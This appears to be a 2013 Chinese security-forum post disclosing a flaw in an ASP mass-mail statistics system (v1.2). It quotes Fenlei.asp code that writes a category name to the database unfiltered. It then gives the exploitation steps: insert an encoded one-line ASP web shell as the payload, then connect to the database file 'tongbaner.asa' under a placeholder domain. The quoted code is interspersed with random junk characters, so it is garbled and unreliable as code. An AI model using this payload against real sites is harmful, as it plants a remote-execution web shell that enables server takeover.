找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1974|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
- M5 I1 l1 V/ C  T$ ^' p9 f5 c/ f5 I4 L( b) {1 Z
IF Request.QueryString("Action")="del" Then
* O- @3 n& d" g: j8 AID=Request.QueryString("ID")
7 H$ P/ y2 m* ?# X" d1 fIF Countss ("tui","Fenlei",ID )<>0 then
  @; T2 j% r: g: L'略 7 y+ c6 V# G' V5 ^/ `6 g; |2 k
IF Request.QueryString("Action")="Add" Then
# ^* r$ j2 J' FTname=Request.Form("Typename")
: C. o! x( [8 `Set Rs=Server.CreateObject("adodb.Recordset")
2 @+ z6 _+ M- pSql="Select * From Fenlei Order by id Desc " 2 I( W6 J0 ~  \3 t- p. z0 W
Rs.Open Sql,Conn,1,3
* z/ m( j/ g8 f, @Rs.Addnew 6 x! Z- Y4 Y9 Q1 Z* W
Rs("Typename")=Tname
- ^0 Y( N7 b: M6 [+ w% c'略
) ^1 m: r, f9 ^Set Rs=Server.CreateObject("adodb.Recordset") 6 O" d" B1 B3 q' ]: R# h, w+ N, ^
Sql="Select * From Fenlei Order by id Desc " % f" o% g" X. r
Rs.Open Sql,Conn,1,1 ! O! Z! I1 C( z4 D! p- ~
'略 ! O8 I$ l5 e0 }; u: Y$ m- w% M, }! V
%>
) m" i* {" }! r0 n' x. S
' D8 w( m; c, y' ?# C0 V
4 f7 M" H" `/ C0 }7 r7 i 7 j: t5 M: B/ p7 a9 C: u
没有过滤,直接写入数据库。5 f: n6 J/ a1 t
6 e3 L# {* \  z' l+ g2 d( [! f
利用方法:$ g$ Y9 c3 L, p0 a7 i6 Y7 h

+ b7 g. x+ {8 }插入:┼攠數畣整爠煥敵瑳∨≡┩>
+ b2 m; F4 w" W* l9 n. R
" S& H9 `& e2 H1 q  e9 I
0 U  L" @& r! r连接: http://www.xxx.com/###tongbaner.asa
4 P. v# c3 J$ A9 E'默认安装文件: 1 c1 ?3 J1 H7 ~' M# R: r! ~
'install.asp
2 @+ L* k' d: }  h- Q5 O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表